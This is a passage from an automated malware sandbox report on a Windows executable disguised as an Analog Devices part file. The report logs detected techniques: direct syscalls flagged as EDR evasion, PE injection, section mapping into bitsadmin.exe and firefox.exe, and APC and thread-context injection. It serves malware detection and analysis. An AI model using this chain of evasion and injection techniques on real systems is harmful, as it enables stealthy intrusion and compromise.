Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173CA6F mov eax, dword ptr fs:[00000030h]	2_2_0173CA6F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173CA6F mov eax, dword ptr fs:[00000030h]	2_2_0173CA6F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]	2_2_01706A50
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]	2_2_01706A50
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]	2_2_01706A50
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]	2_2_01706A50
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]	2_2_01706A50
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]	2_2_01706A50
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]	2_2_01706A50
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710A5B mov eax, dword ptr fs:[00000030h]	2_2_01710A5B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710A5B mov eax, dword ptr fs:[00000030h]	2_2_01710A5B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01724A35 mov eax, dword ptr fs:[00000030h]	2_2_01724A35
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01724A35 mov eax, dword ptr fs:[00000030h]	2_2_01724A35
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173CA24 mov eax, dword ptr fs:[00000030h]	2_2_0173CA24
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172EA2E mov eax, dword ptr fs:[00000030h]	2_2_0172EA2E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178CA11 mov eax, dword ptr fs:[00000030h]	2_2_0178CA11
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173AAEE mov eax, dword ptr fs:[00000030h]	2_2_0173AAEE
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173AAEE mov eax, dword ptr fs:[00000030h]	2_2_0173AAEE
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700AD0 mov eax, dword ptr fs:[00000030h]	2_2_01700AD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01734AD0 mov eax, dword ptr fs:[00000030h]	2_2_01734AD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01734AD0 mov eax, dword ptr fs:[00000030h]	2_2_01734AD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01756ACC mov eax, dword ptr fs:[00000030h]	2_2_01756ACC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01756ACC mov eax, dword ptr fs:[00000030h]	2_2_01756ACC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01756ACC mov eax, dword ptr fs:[00000030h]	2_2_01756ACC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01708AA0 mov eax, dword ptr fs:[00000030h]	2_2_01708AA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01708AA0 mov eax, dword ptr fs:[00000030h]	2_2_01708AA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01756AA4 mov eax, dword ptr fs:[00000030h]	2_2_01756AA4
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01738A90 mov edx, dword ptr fs:[00000030h]	2_2_01738A90
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170EA80 mov eax, dword ptr fs:[00000030h]	2_2_0170EA80

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Memory written: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: NULL target: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Section loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Thread register set: target process: 2044

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\bitsadmin.exe

Thread APC queued: target process: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Jump to behavior

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Process created: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe "C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe"	Jump to behavior
Source: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe	Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: cvSKtqilyhlQ.exe, 00000006.00000000.2198146201.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000006.00000002.3524900332.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000000.2343689945.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: cvSKtqilyhlQ.exe, 00000006.00000000.2198146201.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000006.00000002.3524900332.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000000.2343689945.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: cvSKtqilyhlQ.exe, 00000006.00000000.2198146201.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000006.00000002.3524900332.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000000.2343689945.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: cvSKtqilyhlQ.exe, 00000006.00000000.2198146201.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000006.00000002.3524900332.0000000000DF0000.00000002.00000001.00040000.00000000.sdmp, cvSKtqilyhlQ.exe, 00000008.00000000.2343689945.0000000001700000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
